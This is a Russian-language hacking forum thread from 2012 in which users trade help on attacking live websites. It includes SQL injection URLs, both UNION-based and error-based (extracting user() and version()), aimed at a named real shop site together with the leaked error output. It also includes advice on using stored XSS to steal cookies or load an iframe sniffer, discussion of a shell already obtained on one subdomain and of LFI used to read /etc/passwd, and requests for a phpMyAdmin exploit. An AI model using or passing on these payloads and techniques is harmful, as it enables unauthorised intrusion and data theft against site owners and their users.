ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.05.2012, 13:32
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от Vanzent
Vanzent said:
Как победить?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]tabu72[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]catalog[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]93[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR]
Выдает
Код:
Code:
user warning: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
catalog_taxonomy_select_brands /* Гость :
catalog_taxonomy_select_brands */ SELECT td.tid, td.name
FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
left join term_data td on td.tid = tnn.tid left join node n on tn.nid
= n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE
tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union
select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
all/modules/catalog/catalog.module on line 895. user warning:
The used SELECT statements have a different number of columns
query: pager_query /* Гость : pager_query */ SELECT tn.nid,
td.name, td.tid FROM term_node tn left join term_node tnn on
tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join
node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
= tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in
( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value,
0)=0 and tt.field_dateupdate_value is NULL order by n.title asc
LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
catalog/catalog.module on line 814.
Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки http://tabu72.ru/catalog/93)or(select(1)from(select+count(0),concat((select (concat_ws(0x3b,user(),version()))),floor(rand(0)* 2))from(term_node)+group+by+2)a)--+
|
|
|
28.05.2012, 13:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от mr_zedox
mr_zedox said:
Нашел XSS в post запросе, если я правильно понял то это активка, что через неё сделать можно, если есть полная свобода:
+ни чего ни фильтруется
+работают script src=lyaya.js
и т.д.
отсылать куки на сервер или подгружать айфрейм сниффер.
|
|
|
|
28.05.2012, 13:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
9778
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
отсылать куки на сервер или подгружать айфрейм сниффер.
При запросе с document.cookie выводит билеберду, что-то похожее на md5, вот так:
|
|
|
|
29.05.2012, 01:52
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216
Репутация:
150
|
|
Столкнулся с проблемой.
есть сайт кпримеру antichat.ru, на нем куча поддоменов.
на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((
также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd
они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.
|
|
|
|
29.05.2012, 02:41
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Sleep
Sleep said:
Столкнулся с проблемой.
есть сайт кпримеру antichat.ru, на нем куча поддоменов.
на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((
также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd
они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.
А кто сказал, что они физически в одном месте располагаются?) НАчать с того, что на уровне DNS может на другие IP отсылаться и заканчивая всякими технологиями виртуализациями и ретрансляторами по принципу балансеров.
|
|
|
|
29.05.2012, 05:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Сообщение от None
А кто сказал, что они физически в одном месте располагаются?)
Это можно предположить с помощью reverse ip.
Сообщение от None
Столкнулся с проблемой.
есть сайт кпримеру antichat.ru, на нем куча поддоменов.
на video.antichat.ru у меня есть шелл, но до самого antichat.ru докопаться не могу((
также нашел на другом поддомене к примеру на forum.antichat.ru LFI. глянул в /etc/passwd
они окозались разные тоесть ни такой же как на video.antichat.ru на котором у меня шелл.
Рутай.
|
|
|
|
29.05.2012, 06:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от mix0x0
mix0x0 said:
Это можно предположить с помощью reverse ip.
Рутай.
Автор вопроса не предоставил данных reverse ip.
Но всем и так понятно, кто выше отписался, и кого вы прокомментировали, что в конкретном случае у Sleep'a, основной сайт и его поддомены физически разнесены по разным серверам. Да, так бывает, к сожалению, лол. И сей прискорбный факт ввел его в ступор.
Поддерживаю сарказм и легкую иронию всех выше отписавшихся по этому вопросу.
|
|
|
|
29.05.2012, 22:17
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
ребят,знает кто,чем можно сдампить данные через скулю(error-based) в хэдере client-ip?
sqlmap вроде как не справился...(
|
|
|
|
30.05.2012, 00:07
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от mix0x0
mix0x0 said:
Это можно предположить с помощью reverse ip.
Рутай.
И что reverseIP ? ФИзически - значит в локации единой как пространство данной конкретной ФС - а это вполне вмещает в себя тот же ксен и тп. И реверс будет один IP отдавать - а человек будет тупить и не понимать - отчего же ему выдает два разных passwd с одного хоста на одном IP
|
|
|
|
30.05.2012, 00:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
2422
Репутация:
0
|
|
Ребята! подскажите сплоит для phpmyadmin 3.3.8 плииз
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
